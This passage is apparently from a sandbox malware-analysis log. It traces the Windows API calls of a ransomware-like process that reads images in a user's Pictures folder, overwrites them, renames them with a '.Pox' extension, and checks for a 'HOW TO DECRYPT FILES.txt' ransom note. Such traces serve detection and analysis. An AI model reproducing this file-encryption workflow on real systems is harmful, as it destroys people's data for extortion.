HALPmcxz\\Pictures\\GHzQiL.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghzqil.bmp.pox")) returned 1 [0040.342] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg", lpFilePart=0x0) returned 0x37 [0040.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hyjfoaoaxwsv.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.342] GetFileType (hFile=0x26c) returned 0x1 [0040.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0040.342] GetFileType (hFile=0x26c) returned 0x1 [0040.343] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x1663e [0040.343] ReadFile (in: hFile=0x26c, lpBuffer=0x35bf7f8, nNumberOfBytesToRead=0x1663e, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x35bf7f8*, lpNumberOfBytesRead=0x3ae570*=0x1663e, lpOverlapped=0x0) returned 1 [0040.344] CloseHandle (hObject=0x26c) returned 1 [0040.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0040.360] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0040.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg", lpFilePart=0x0) returned 0x37 [0040.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0040.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hyjfoaoaxwsv.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.362] GetFileType (hFile=0x26c) returned 0x1 [0040.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0040.362] GetFileType (hFile=0x26c) returned 0x1 [0040.362] WriteFile (in: hFile=0x26c, lpBuffer=0x362f778*, nNumberOfBytesToWrite=0x16640, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x362f778*, lpNumberOfBytesWritten=0x3ae564*=0x16640, lpOverlapped=0x0) returned 1 [0040.364] CloseHandle (hObject=0x26c) returned 1 [0040.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg", lpFilePart=0x0) returned 0x37 [0040.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg.Pox", lpFilePart=0x0) returned 0x3b [0040.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0040.365] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hyjfoaoaxwsv.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b1a090, ftCreationTime.dwHighDateTime=0x1d4d31c, ftLastAccessTime.dwLowDateTime=0x8e1cede0, ftLastAccessTime.dwHighDateTime=0x1d4d544, ftLastWriteTime.dwLowDateTime=0x2a3eb660, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0040.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0040.366] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hyjfoaoaxwsv.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hyJFOAoAXwsv.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hyjfoaoaxwsv.jpg.pox")) returned 1 [0040.366] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png", lpFilePart=0x0) returned 0x3e [0040.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v_sdmrpvb-dcau80ds7.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.366] GetFileType (hFile=0x26c) returned 0x1 [0040.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0040.366] GetFileType (hFile=0x26c) returned 0x1 [0040.366] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x9b8b [0040.367] ReadFile (in: hFile=0x26c, lpBuffer=0x24f2510, nNumberOfBytesToRead=0x9b8b, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24f2510*, lpNumberOfBytesRead=0x3ae570*=0x9b8b, lpOverlapped=0x0) returned 1 [0040.367] CloseHandle (hObject=0x26c) returned 1 [0040.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0040.383] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0040.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png", lpFilePart=0x0) returned 0x3e [0040.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0040.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v_sdmrpvb-dcau80ds7.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.384] GetFileType (hFile=0x26c) returned 0x1 [0040.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0040.384] GetFileType (hFile=0x26c) returned 0x1 [0040.384] WriteFile (in: hFile=0x26c, lpBuffer=0x256fccc*, nNumberOfBytesToWrite=0x9b90, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x256fccc*, lpNumberOfBytesWritten=0x3ae564*=0x9b90, lpOverlapped=0x0) returned 1 [0040.386] CloseHandle (hObject=0x26c) returned 1 [0040.387] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png", lpFilePart=0x0) returned 0x3e [0040.387] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png.Pox", lpFilePart=0x0) returned 0x42 [0040.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0040.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v_sdmrpvb-dcau80ds7.png"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29abcc0, ftCreationTime.dwHighDateTime=0x1d4c536, ftLastAccessTime.dwLowDateTime=0xd2b1a1c0, ftLastAccessTime.dwHighDateTime=0x1d4c96a, ftLastWriteTime.dwLowDateTime=0x2a4117c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x9b90)) returned 1 [0040.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0040.387] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v_sdmrpvb-dcau80ds7.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v_sDMrPVb-DCaU80ds7.png.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v_sdmrpvb-dcau80ds7.png.pox")) returned 1 [0040.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc", lpFilePart=0x0) returned 0x2f [0040.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\", lpFilePart=0x0) returned 0x30 [0040.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b9613e0, ftCreationTime.dwHighDateTime=0x1d4ca2b, ftLastAccessTime.dwLowDateTime=0xa1a1e7b0, ftLastAccessTime.dwHighDateTime=0x1d4ca6f, ftLastWriteTime.dwLowDateTime=0xa1a1e7b0, ftLastWriteTime.dwHighDateTime=0x1d4ca6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.388] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b9613e0, ftCreationTime.dwHighDateTime=0x1d4ca2b, ftLastAccessTime.dwLowDateTime=0xa1a1e7b0, ftLastAccessTime.dwHighDateTime=0x1d4ca6f, ftLastWriteTime.dwLowDateTime=0xa1a1e7b0, ftLastWriteTime.dwHighDateTime=0x1d4ca6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.388] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9ba3ff0, ftCreationTime.dwHighDateTime=0x1d4d3aa, ftLastAccessTime.dwLowDateTime=0x4b5ad090, ftLastAccessTime.dwHighDateTime=0x1d4cfda, ftLastWriteTime.dwLowDateTime=0x4b5ad090, ftLastWriteTime.dwHighDateTime=0x1d4cfda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2xdnrnaXUHwWYk2evk3", cAlternateFileName="2XDNRN~1")) returned 1 [0040.388] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7b65d70, ftCreationTime.dwHighDateTime=0x1d4c947, ftLastAccessTime.dwLowDateTime=0x6e9b4df0, ftLastAccessTime.dwHighDateTime=0x1d4d0ca, ftLastWriteTime.dwLowDateTime=0x6e9b4df0, ftLastWriteTime.dwHighDateTime=0x1d4d0ca, nFileSizeHigh=0x0, nFileSizeLow=0x2c7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="AamMrzPmlGyXhuwAk.png", cAlternateFileName="AAMMRZ~1.PNG")) returned 1 [0040.389] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c9b310, ftCreationTime.dwHighDateTime=0x1d4d44b, ftLastAccessTime.dwLowDateTime=0x2eef17a0, ftLastAccessTime.dwHighDateTime=0x1d4c8f9, ftLastWriteTime.dwLowDateTime=0x2eef17a0, ftLastWriteTime.dwHighDateTime=0x1d4c8f9, nFileSizeHigh=0x0, nFileSizeLow=0xccd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="EOesE9egGtlf_.jpg", cAlternateFileName="EOESE9~1.JPG")) returned 1 [0040.389] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1f91080, ftCreationTime.dwHighDateTime=0x1d4cd98, ftLastAccessTime.dwLowDateTime=0xe6dd7280, ftLastAccessTime.dwHighDateTime=0x1d4d394, ftLastWriteTime.dwLowDateTime=0xe6dd7280, ftLastWriteTime.dwHighDateTime=0x1d4d394, nFileSizeHigh=0x0, nFileSizeLow=0x14f0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LNbCQirEd1.bmp", cAlternateFileName="LNBCQI~1.BMP")) returned 1 [0040.389] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x317070f0, ftCreationTime.dwHighDateTime=0x1d4cd4f, ftLastAccessTime.dwLowDateTime=0xb764e240, ftLastAccessTime.dwHighDateTime=0x1d4d330, ftLastWriteTime.dwLowDateTime=0xb764e240, ftLastWriteTime.dwHighDateTime=0x1d4d330, nFileSizeHigh=0x0, nFileSizeLow=0x49c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="UFVPng9rMg2O.bmp", cAlternateFileName="UFVPNG~1.BMP")) returned 1 [0040.389] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.389] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.389] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc", lpFilePart=0x0) returned 0x2f [0040.389] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\", lpFilePart=0x0) returned 0x30 [0040.389] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b9613e0, ftCreationTime.dwHighDateTime=0x1d4ca2b, ftLastAccessTime.dwLowDateTime=0xa1a1e7b0, ftLastAccessTime.dwHighDateTime=0x1d4ca6f, ftLastWriteTime.dwLowDateTime=0xa1a1e7b0, ftLastWriteTime.dwHighDateTime=0x1d4ca6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b9613e0, ftCreationTime.dwHighDateTime=0x1d4ca2b, ftLastAccessTime.dwLowDateTime=0xa1a1e7b0, ftLastAccessTime.dwHighDateTime=0x1d4ca6f, ftLastWriteTime.dwLowDateTime=0xa1a1e7b0, ftLastWriteTime.dwHighDateTime=0x1d4ca6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9ba3ff0, ftCreationTime.dwHighDateTime=0x1d4d3aa, ftLastAccessTime.dwLowDateTime=0x4b5ad090, ftLastAccessTime.dwHighDateTime=0x1d4cfda, ftLastWriteTime.dwLowDateTime=0x4b5ad090, ftLastWriteTime.dwHighDateTime=0x1d4cfda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2xdnrnaXUHwWYk2evk3", cAlternateFileName="2XDNRN~1")) returned 1 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7b65d70, ftCreationTime.dwHighDateTime=0x1d4c947, ftLastAccessTime.dwLowDateTime=0x6e9b4df0, ftLastAccessTime.dwHighDateTime=0x1d4d0ca, ftLastWriteTime.dwLowDateTime=0x6e9b4df0, ftLastWriteTime.dwHighDateTime=0x1d4d0ca, nFileSizeHigh=0x0, nFileSizeLow=0x2c7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="AamMrzPmlGyXhuwAk.png", cAlternateFileName="AAMMRZ~1.PNG")) returned 1 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c9b310, ftCreationTime.dwHighDateTime=0x1d4d44b, ftLastAccessTime.dwLowDateTime=0x2eef17a0, ftLastAccessTime.dwHighDateTime=0x1d4c8f9, ftLastWriteTime.dwLowDateTime=0x2eef17a0, ftLastWriteTime.dwHighDateTime=0x1d4c8f9, nFileSizeHigh=0x0, nFileSizeLow=0xccd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="EOesE9egGtlf_.jpg", cAlternateFileName="EOESE9~1.JPG")) returned 1 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1f91080, ftCreationTime.dwHighDateTime=0x1d4cd98, ftLastAccessTime.dwLowDateTime=0xe6dd7280, ftLastAccessTime.dwHighDateTime=0x1d4d394, ftLastWriteTime.dwLowDateTime=0xe6dd7280, ftLastWriteTime.dwHighDateTime=0x1d4d394, nFileSizeHigh=0x0, nFileSizeLow=0x14f0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LNbCQirEd1.bmp", cAlternateFileName="LNBCQI~1.BMP")) returned 1 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x317070f0, ftCreationTime.dwHighDateTime=0x1d4cd4f, ftLastAccessTime.dwLowDateTime=0xb764e240, ftLastAccessTime.dwHighDateTime=0x1d4d330, ftLastWriteTime.dwLowDateTime=0xb764e240, ftLastWriteTime.dwHighDateTime=0x1d4d330, nFileSizeHigh=0x0, nFileSizeLow=0x49c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="UFVPng9rMg2O.bmp", cAlternateFileName="UFVPNG~1.BMP")) returned 1 [0040.390] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x317070f0, ftCreationTime.dwHighDateTime=0x1d4cd4f, ftLastAccessTime.dwLowDateTime=0xb764e240, ftLastAccessTime.dwHighDateTime=0x1d4d330, ftLastWriteTime.dwLowDateTime=0xb764e240, ftLastWriteTime.dwHighDateTime=0x1d4d330, nFileSizeHigh=0x0, nFileSizeLow=0x49c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="UFVPng9rMg2O.bmp", cAlternateFileName="UFVPNG~1.BMP")) returned 0 [0040.391] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.391] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png", lpFilePart=0x0) returned 0x45 [0040.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0040.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\aammrzpmlgyxhuwak.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.391] GetFileType (hFile=0x26c) returned 0x1 [0040.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0040.391] GetFileType (hFile=0x26c) returned 0x1 [0040.391] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x2c7d [0040.391] ReadFile (in: hFile=0x26c, lpBuffer=0x257c0fc, nNumberOfBytesToRead=0x2c7d, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x257c0fc*, lpNumberOfBytesRead=0x3ae4fc*=0x2c7d, lpOverlapped=0x0) returned 1 [0040.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0040.451] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0040.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png", lpFilePart=0x0) returned 0x45 [0040.452] SetThreadErrorMode 